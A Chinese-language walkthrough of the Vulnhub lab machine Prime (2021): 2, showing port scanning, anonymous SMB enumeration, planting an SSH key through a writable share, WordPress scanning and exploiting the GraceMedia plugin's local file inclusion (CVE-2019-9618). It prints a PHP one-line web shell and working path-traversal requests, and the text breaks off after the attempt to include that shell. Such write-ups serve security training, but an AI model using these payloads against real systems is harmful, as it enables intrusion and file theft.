【Vulnhub 靶场】【Prime (2021): 2】【简单 - 中等】【20210509】

1、环境介绍

靶场介绍:https://www.vulnhub.com/entry/prime-2021-2,696/
靶场下载:https://download.vulnhub.com/prime-2021/Prime-2.ova
靶场难度:简单 - 中等
发布日期:2021年5月9日
文件大小:3.7 GB
靶场作者:Sura
靶场系列:Prime (2021)
靶场描述

  • 这个虚拟机将给你一些全球级认证所需的真实概念。你会喜欢这个虚拟机,因为它是网络和网络测试的完美结合。
  • VMware 打开,不适用 VirtualBox

打靶耗时:4+小时,存在两条打靶路线,殊途同归,算是中规中矩,打靶路线清晰,我个人则是本着练习的目的,多尝试了一些其他思路
打靶关键

  1. SMB 信息收集 与 操作
  2. Web 目录扫描、WordPress CMS扫描
  3. LXD 提权

2、主机发现与端口扫描

  • 攻击机 IP: 192.168.110.139
  • 靶 机 IP: 192.168.110.138
(base) ┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:5c:06:40, IPv4: 192.168.110.139
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.110.1   00:50:56:c0:00:01       VMware, Inc.
192.168.110.138 00:0c:29:52:42:78       VMware, Inc.
192.168.110.254 00:50:56:e0:2b:92       VMware, Inc.

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.318 seconds (110.44 hosts/sec). 3 responded
(base) ┌──(root㉿kali)-[~]
└─# nmap -T4 -sC -sV -p- -A --min-rate=1000 192.168.110.138
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-04 00:32 EST
Nmap scan report for 192.168.110.138
Host is up (0.0017s latency).
Not shown: 65530 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 8.4p1 Ubuntu 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 0a:16:3f:c8:1a:7d:ff:f5:7a:66:05:63:76:7c:5a:95 (RSA)
|   256 7f:47:44:cc:d1:c4:b7:54:de:4f:27:f2:39:38:ff:6e (ECDSA)
|_  256 f5:d3:36:44:43:40:3d:11:9b:d1:a6:24:9f:99:93:f7 (ED25519)
80/tcp    open  http        Apache httpd 2.4.46 ((Ubuntu))
|_http-server-header: Apache/2.4.46 (Ubuntu)
|_http-title: HackerCTF
139/tcp   open  netbios-ssn Samba smbd 4.6.2
445/tcp   open  netbios-ssn Samba smbd 4.6.2
10123/tcp open  http        SimpleHTTPServer 0.6 (Python 3.9.4)
|_http-title: Directory listing for /
|_http-server-header: SimpleHTTP/0.6 Python/3.9.4
MAC Address: 00:0C:29:52:42:78 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: HACKERCTFLAB, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time: 
|   date: 2023-12-04T13:33:03
|_  start_date: N/A
|_clock-skew: 7h59m49s

TRACEROUTE
HOP RTT     ADDRESS
1   1.69 ms 192.168.110.138

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.70 seconds

3、端口访问

3.1、22端口 - SSH

  • 初步访问,提示信息收集
(base) ┌──(root㉿kali)-[~]
└─# ssh 192.168.110.138                    
The authenticity of host '192.168.110.138 (192.168.110.138)' can·t be established.
ED25519 key fingerprint is SHA256:nB+xRANNsBufP64KnDjxamkvfGVw1eJUiz/kCMnJ9wU.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.110.138' (ED25519) to the list of known hosts.
root@192.168.110.138·s password: 
Permission denied, please try again.
root@192.168.110.138·s password: 
Permission denied, please try again.
root@192.168.110.138·s password: 
root@192.168.110.138: Permission denied (publickey,password).

3.2、139/445端口 - SMB

  • 好家伙,这一条命令用了一个小时。。。好在收获颇丰!(●´∀`●)ノ
  • 获取信息:
    • 存在一个免密的共享文件夹://192.168.110.138/welcome
      • 经验证是「/home/jarves
    • 发现一个用户:jarves,并且主目录权限是 755
    • 主目录下发现了一个:一句话木马
      • 后续着重查找「文件包含漏洞(LFI)
    • 数据库历史文件中获取:_HiStOrY_V2_
    • 经测试可以上传文件!!!
      • 尝试上传「.ssh」文件,进行免密登录
(base) ┌──(root㉿kali)-[~]
└─# enum4linux 192.168.110.138
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Dec  4 00:44:43 2023

 =========================================( Target Information )=========================================

Target ........... 192.168.110.138
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ==========================( Enumerating Workgroup/Domain on 192.168.110.138 )==========================

[+] Got domain/workgroup name: WORKGROUP

 ==============================( Nbtstat Information for 192.168.110.138 )==============================

Looking up status of 192.168.110.138
        HACKERCTFLAB    <00> -         B <ACTIVE>  Workstation Service
        HACKERCTFLAB    <03> -         B <ACTIVE>  Messenger Service
        HACKERCTFLAB    <20> -         B <ACTIVE>  File Server Service
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

        MAC Address = 00-00-00-00-00-00

 ==================================( Session Check on 192.168.110.138 )==================================

[+] Server 192.168.110.138 allows sessions using username '', password ''

 ===============================( Getting domain SID for 192.168.110.138 )===============================

Domain Name: WORKGROUP
Domain Sid: (NULL SID)

[+] Can·t determine if host is part of domain or part of a workgroup

 =================================( OS information on 192.168.110.138 )=================================

[E] Can·t get OS info with smbclient

[+] Got OS info for 192.168.110.138 from srvinfo: 
        HACKERCTFLAB   Wk Sv PrQ Unx NT SNT hackerctflab server (Samba, Ubuntu)
        platform_id     :       500
        os version      :       6.1
        server type     :       0x809a03

 ======================================( Users on 192.168.110.138 )======================================

Use of uninitialized value $users in print at ./enum4linux.pl line 972.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975.

Use of uninitialized value $users in print at ./enum4linux.pl line 986.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988.

 ================================( Share Enumeration on 192.168.110.138 )================================

smbXcli_negprot_smb1_done: No compatible protocol selected by server.

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        welcome         Disk      Welcome to Hackerctf LAB
        IPC$            IPC       IPC Service (hackerctflab server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Protocol negotiation to server 192.168.110.138 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 192.168.110.138

//192.168.110.138/print$        Mapping: DENIED Listing: N/A Writing: N/A
//192.168.110.138/welcome       Mapping: OK Listing: OK Writing: N/A

[E] Can·t understand response:

NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//192.168.110.138/IPC$  Mapping: N/A Listing: N/A Writing: N/A

 ==========================( Password Policy Information for 192.168.110.138 )==========================

[+] Attaching to 192.168.110.138 using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

        [+] HACKERCTFLAB
        [+] Builtin

[+] Password Info for Domain: HACKERCTFLAB

        [+] Minimum password length: 5
        [+] Password history length: None
        [+] Maximum password age: 37 days 6 hours 21 minutes 
        [+] Password Complexity Flags: 000000

                [+] Domain Refuse Password Change: 0
                [+] Domain Password Store Cleartext: 0
                [+] Domain Password Lockout Admins: 0
                [+] Domain Password No Clear Change: 0
                [+] Domain Password No Anon Change: 0
                [+] Domain Password Complex: 0

        [+] Minimum password age: None
        [+] Reset Account Lockout Counter: 30 minutes 
        [+] Locked Account Duration: 30 minutes 
        [+] Account Lockout Threshold: None
        [+] Forced Log off Time: 37 days 6 hours 21 minutes 

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5

 =====================================( Groups on 192.168.110.138 )=====================================

[+]  Getting builtin groups:
[+]  Getting builtin group memberships:
[+]  Getting local groups:
[+]  Getting local group memberships:
[+]  Getting domain groups:
[+]  Getting domain group memberships:

 =================( Users on 192.168.110.138 via RID cycling (RIDS: 500-550,1000-1050) )=================

[I] Found new SID: 
S-1-22-1

[I] Found new SID: 
S-1-5-32

[I] Found new SID: 
S-1-5-32

[I] Found new SID: 
S-1-5-32

[I] Found new SID: 
S-1-5-32

[+] Enumerating users using SID S-1-5-32 and logon username '', password ''

S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

[+] Enumerating users using SID S-1-5-21-1614152883-4007063313-3639854138 and logon username '', password ''

S-1-5-21-1614152883-4007063313-3639854138-501 HACKERCTFLAB\nobody (Local User)
S-1-5-21-1614152883-4007063313-3639854138-513 HACKERCTFLAB\None (Domain Group)

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''

S-1-22-1-1000 Unix User\jarves (Local User)

 ==============================( Getting printer info for 192.168.110.138 )==============================

No printers returned.

enum4linux complete on Mon Dec  4 14:40:39 2023

3.2.1、免密登录 SMB

  • 看上去好像是「/home」文件夹
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# smbclient //192.168.110.138/welcome                                             
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat May  8 15:42:49 2021
  ..                                  D        0  Sat May  8 02:38:58 2021
  .mysql_history                      H       18  Sat May  8 15:05:03 2021
  .profile                            H      807  Sat Mar 20 00:02:58 2021
  upload                              D        0  Sun May  9 19:19:02 2021
  .sudo_as_admin_successful           H        0  Sat May  8 13:34:48 2021
  .bash_logout                        H      220  Sat Mar 20 00:02:58 2021
  .cache                             DH        0  Sat May  8 02:39:15 2021
  something                           N       82  Sat May  8 00:18:09 2021
  secrets                             N        0  Sat May  8 00:15:17 2021
  .bash_history                       H       72  Sun May  9 19:23:26 2021
  .bashrc                             H     3771  Sat Mar 20 00:02:58 2021

                19475088 blocks of size 1024. 9580192 blocks available

3.2.2、信息收集

smb: \> cd upload
smb: \upload\> ls
  .                                   D        0  Sun May  9 19:19:02 2021
  ..                                  D        0  Sat May  8 15:42:49 2021
  shell.php                           A       35  Sun May  9 19:19:02 2021

                19475088 blocks of size 1024. 9580164 blocks available
smb: \> get something
getting file \something of size 82 as something (5.7 KiloBytes/sec) (average 5.7 KiloBytes/sec)
smb: \> get .bash_history bash_history
getting file \.bash_history of size 72 as bash_history (3.3 KiloBytes/sec) (average 4.3 KiloBytes/sec)
smb: \> get .mysql_history mysql_history
getting file \.mysql_history of size 18 as mysql_history (1.5 KiloBytes/sec) (average 54.0 KiloBytes/sec)
smb: \> cd upload
smb: \upload\> get shell.php 
getting file \upload\shell.php of size 35 as shell.php (3.1 KiloBytes/sec) (average 64.5 KiloBytes/sec)
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# cat something            
I wanted to make it my home directory. But idea must be changed.
我想把它作为我的主目录。但这个想法必须改变。

Thanks,
jarves

(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# cat bash_history 
sudo su -
ifconfig
ls
cd upload/
ls
ls -l
cd ..
ls -l
chmod 755 jarves/

(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# cat mysql_history   
_HiStOrY_V2_
exit

(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# cat shell.php 
<?php echo system($_GET['cmd']);?>

3.2.3、尝试上传 秘钥到 「.ssh」(到这里就已经 getshell 了)

  • 不过,后面依然正常信息收集,否则这样太快了吧 (⊙ˍ⊙)
  • 可以直接跳到「第 7 节
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# ssh-keygen -f patrick
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in patrick
Your public key has been saved in patrick.pub
The key fingerprint is:
SHA256:XFa0aqVJED/BYuhoEu/ZKkvTVycjqpnBzlsyXJrZZ4s root@kali
The key's randomart image is:
+---[RSA 3072]----+
|       .oo..o    |
|  .   . oo.o .   |
|   o o . .* o    |
|  . + .. + *     |
|   +.o. S *      |
| o Bo..o =       |
|  % =.+          |
| +.X.= .         |
|  O+E .          |
+----[SHA256]-----+
                                                                                                      
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# cp patrick.pub authorized_keys

(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# chmod 600 patrick

(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# smbclient //192.168.110.138/welcome
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> mkdir .ssh
smb: \> cd .ssh
smb: \.ssh\> put authorized_keys 
putting file authorized_keys as \.ssh\authorized_keys (68.7 kb/s) (average 68.7 kb/s)
smb: \.ssh\> ls
  .                                   D        0  Mon Dec  4 21:51:11 2023
  ..                                  D        0  Mon Dec  4 21:51:01 2023
  authorized_keys                     A      563  Mon Dec  4 21:51:11 2023

                19475088 blocks of size 1024. 10125796 blocks available
smb: \.ssh\> exit
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# ssh jarves@192.168.110.138 -i patrick
Welcome to Ubuntu 21.04 (GNU/Linux 5.11.0-16-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon Dec  4 01:52:40 PM UTC 2023

  System load: 0.11               Memory usage: 17%   Processes:       233
  Usage of /:  42.8% of 18.57GB   Swap usage:   0%    Users logged in: 0

  => There were exceptions while processing one or more plugins. See
     /var/log/landscape/sysinfo.log for more information.

 * Pure upstream Kubernetes 1.21, smallest, simplest cluster ops!

     https://microk8s.io/

9 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Sun May  9 11:14:10 2021
jarves@hackerctflab:~$

3.3、80端口 - Web

  • 获取信息整理:
    • 发现存在「.git」文件
    • 发现存在「WordPress」
    • 「server」目录有个压缩文件

3.3.1、目录扫描

# 基础小字典,初扫摸底
dirb http://192.168.110.138
# 较全面 conda activate py37
dirsearch -u http://192.168.110.138 -t 64 -e *
# 包含静态检查 conda activate py310
cd ~/dirsearch_bypass403 ; python dirsearch.py -u "http://192.168.110.138" -j yes -b yes
# 较全面 Plus conda activate py39
cd ~/soft/dirmap ; python3 dirmap.py -i http://192.168.110.138 -lcf
# 常规文件扫描
gobuster dir -u http://192.168.110.138 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x txt,php,html,conf -e -k -r -q
# 可执行文件扫描
gobuster dir -u http://192.168.110.138 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x js,aspx,cgi,sh,jsp -e -k -r -q
# 压缩包,备份扫描
gobuster dir -u http://192.168.110.138 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x rar,zip,7z,tar.gz,bak,php.bak,txt,old,temp -e -k -r -q
  • http://192.168.110.138/index.html
  • http://192.168.110.138/wp/index.php
  • http://192.168.110.138/wp/wp-login.php
  • http://192.168.110.138/css/
  • http://192.168.110.138/images/
  • http://192.168.110.138/javascript/
  • http://192.168.110.138/server/
  • http://192.168.110.138/wp/
  • http://192.168.110.138/wp/.git/
  • http://192.168.110.138/wp/wp-admin/
  • http://192.168.110.138/wp/wp-content/uploads/

在这里插入图片描述

3.3.2、「server」文件下载/解压

  • 是一个存在「RCE」漏洞的「CMS」,但是当前不知道哪里使用了
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# unzip 45f8b764b45cdb6d75cda2ab01231293-gila-1.10.9.zip
Archive:  45f8b764b45cdb6d75cda2ab01231293-gila-1.10.9.zip
14b1c3e707ec8cd33b353c7b2ec7067202933cd2
   creating: gila-1.10.9/
......

(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# cd gila-1.10.9 
                                                                                                       
(base) ┌──(root㉿kali)-[/usr/local/soft/hack/gila-1.10.9]
└─# ls -al
总计 68
drwxr-xr-x  9 root root 4096 20197月10日 .
drwxr-xr-x  5 root root 4096 12419:39 ..
-rw-r--r--  1 root root  241 20197月10日 app.yaml
drwxr-xr-x  2 root root 4096 20197月10日 assets
-rw-r--r--  1 root root  131 20197月10日 composer.json
-rwxr-xr-x  1 root root  653 20197月10日 config.default.php
-rw-r--r--  1 root root  639 20197月10日 Dockerfile
-rwxr-xr-x  1 root root 1065 20197月10日 .htaccess
-rwxr-xr-x  1 root root  143 20197月10日 index.php
drwxr-xr-x 11 root root 4096 20197月10日 lib
-rwxr-xr-x  1 root root 1526 20197月10日 LICENSE
drwxr-xr-x  2 root root 4096 20197月10日 log
-rw-r--r--  1 root root   65 20197月10日 robots.txt
drwxr-xr-x  2 root root 4096 20197月10日 sites
drwxr-xr-x  9 root root 4096 20197月10日 src
drwxr-xr-x  4 root root 4096 20197月10日 themes
drwxr-xr-x  2 root root 4096 20197月10日 tmp

在这里插入图片描述

3.3.3、下载「.git」

  • 打开报错,未找到处理方式,暂时搁置
(py27) ┌──(root㉿kali)-[/usr/local/soft/GitHack]
└─# python GitHack.py http://192.168.110.138/wp/.git/

  ____ _ _   _   _            _
 / ___(_) |_| | | | __ _  ___| | __
| |  _| | __| |_| |/ _` |/ __| |/ /
| |_| | | |_|  _  | (_| | (__|   <
 \____|_|\__|_| |_|\__,_|\___|_|\_\{0.0.5}
 A '.git' folder disclosure exploit.

[*] Check Depends
[+] Check depends end
[*] Set Paths
[*] Target Url: http://192.168.110.138/wp/.git/
[*] Initialize Target
[*] Try to Clone straightly
[*] Clone
正克隆到 '/usr/local/soft/GitHack/dist/192.168.110.138'...
致命错误:仓库 'http://192.168.110.138/wp/.git/' 未找到
[-] Clone Error
[*] Try to Clone with Directory Listing
[*] http://192.168.110.138/wp/.git/ is support Directory Listing
[*] Initialize Git
[!] Initialize Git Error: 提示:使用 'master' 作为初始分支的名称。这个默认分支名称可能会更改。要在新仓 库中
提示:配置使用初始分支名,并消除这条警告,请执行:
提示:
提示:  git config --global init.defaultBranch <名称>
提示:
提示:除了 'master' 之外,通常选定的名字有 'main''trunk''development'。
提示:可以通过以下命令重命名刚创建的分支:
提示:
提示:  git branch -m <name>
......
[*] objects/3d/4f6056f57c26f22d4d2b0c3068731de0074040
[*] objects/34/1a6dc84dc556eb30ac23b7ac42858e6ce128a6
[*] Valid Repository
[*] Valid Repository Fail
[-] Clone With Cache end. But missed some files.

[+] Clone Success. Dist File : /usr/local/soft/GitHack/dist/192.168.110.138

3.3.4、WordPress CMS 扫描

  • 版本:WordPress version 5.8
  • 主题:http://192.168.110.138/wp/wp-content/themes/twentytwentyone/
  • 漏洞:插件漏洞 - CVE-2019-9618(LFI)(46537)(需要使用 api-token 才能扫描到)
  • 用户:admin
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# wpscan --url=http://192.168.110.138/wp/ --ignore-main-redirect --force -e --plugins-detection aggressive --api-token [token]
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | ·_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.110.138/wp/ [192.168.110.138]
[+] Started: Mon Dec  4 19:30:43 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.46 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.110.138/wp/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.110.138/wp/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.110.138/wp/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.110.138/wp/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.8 identified (Insecure, released on 2021-07-20).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.110.138/wp/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.8'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.110.138/wp/, Match: 'WordPress 5.8'
 |
 | [!] 36 vulnerabilities identified:
 |
 | [!] Title: WordPress 5.4 to 5.8 - Data Exposure via REST API
 |     Fixed in: 5.8.1
 |     References:
 |      - https://wpscan.com/vulnerability/38dd7e87-9a22-48e2-bab1-dc79448ecdfb
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39200
 |      - https://wordpress.org/news/2021/09/wordpress-5-8-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/ca4765c62c65acb732b574a6761bf5fd84595706
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-m9hc-7v5q-x8q5
 |
......
[+] WordPress theme in use: twentytwentyone
 | Location: http://192.168.110.138/wp/wp-content/themes/twentytwentyone/
 | Last Updated: 2023-11-07T00:00:00.000Z
 | Readme: http://192.168.110.138/wp/wp-content/themes/twentytwentyone/readme.txt
 | [!] The version is out of date, the latest version is 2.0
 | Style URL: http://192.168.110.138/wp/wp-content/themes/twentytwentyone/style.css?ver=1.3
 | Style Name: Twenty Twenty-One
 | Style URI: https://wordpress.org/themes/twentytwentyone/
 | Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.110.138/wp/wp-content/themes/twentytwentyone/style.css?ver=1.3, Match: 'Version: 1.3'

[+] Enumerating Vulnerable Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:00:23 <=====================> (6539 / 6539) 100.00% Time: 00:00:23
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] gracemedia-media-player
 | Location: http://192.168.110.138/wp/wp-content/plugins/gracemedia-media-player/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2013-07-21T15:09:00.000Z
 | Readme: http://192.168.110.138/wp/wp-content/plugins/gracemedia-media-player/readme.txt
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.110.138/wp/wp-content/plugins/gracemedia-media-player/, status: 200
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: GraceMedia Media Player 1.0 - Local File Inclusion (LFI)
 |     References:
 |      - https://wpscan.com/vulnerability/a4f5b10f-3386-45cc-9548-dd7bbea199d6
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
 |      - https://www.exploit-db.com/exploits/46537/
 |      - https://seclists.org/fulldisclosure/2019/Mar/26
 |
 | Version: 1.0 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.110.138/wp/wp-content/plugins/gracemedia-media-player/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://192.168.110.138/wp/wp-content/plugins/gracemedia-media-player/readme.txt

......
[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 4
 | Requests Remaining: 21

[+] Finished: Mon Dec  4 19:31:36 2023
[+] Requests Done: 10113
[+] Cached Requests: 12
[+] Data Sent: 2.832 MB
[+] Data Received: 1.891 MB
[+] Memory used: 253.559 MB
[+] Elapsed time: 00:00:52

3.4、10123端口 - SMB 的 Web 服务

  • 点击文件,即下载

在这里插入图片描述

4、46537:CVE-2019-9618(LFI)漏洞利用

4.1、漏洞下载 并 查看利用方式

(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# searchsploit 46537
-------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                      |  Path
-------------------------------------------------------------------- ---------------------------------
WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion | php/webapps/46537.txt
-------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                                                      
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# searchsploit -m 46537.txt
  Exploit: WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion
      URL: https://www.exploit-db.com/exploits/46537
     Path: /usr/share/exploitdb/exploits/php/webapps/46537.txt
    Codes: CVE-2019-9618
 Verified: False
File Type: Unicode text, UTF-8 text
Copied to: /usr/local/soft/hack/46537.txt

                                                                                                      
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# cat 46537.txt 
=============================================
MGC ALERT 2019-001
- Original release date: February 06, 2019
- Last revised:  March 13, 2019
- Discovered by: Manuel García Cárdenas
- Severity: 7/10 (CVSS Base Score)
- CVE-ID: CVE-2019-9618
=============================================
......
GET
/wordpress/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd
......

4.2、Poc构造

4.2.1、验证漏洞

(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# curl "http://192.168.110.138/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
jarves:x:1000:1000:jarves:/home/jarves:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:113:117:MySQL Server,,,:/nonexistent:/bin/false

4.2.2、利用漏洞,访问「/home/jarves/upload/shell.php」

(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# curl "http://192.168.110.138/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php"

(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
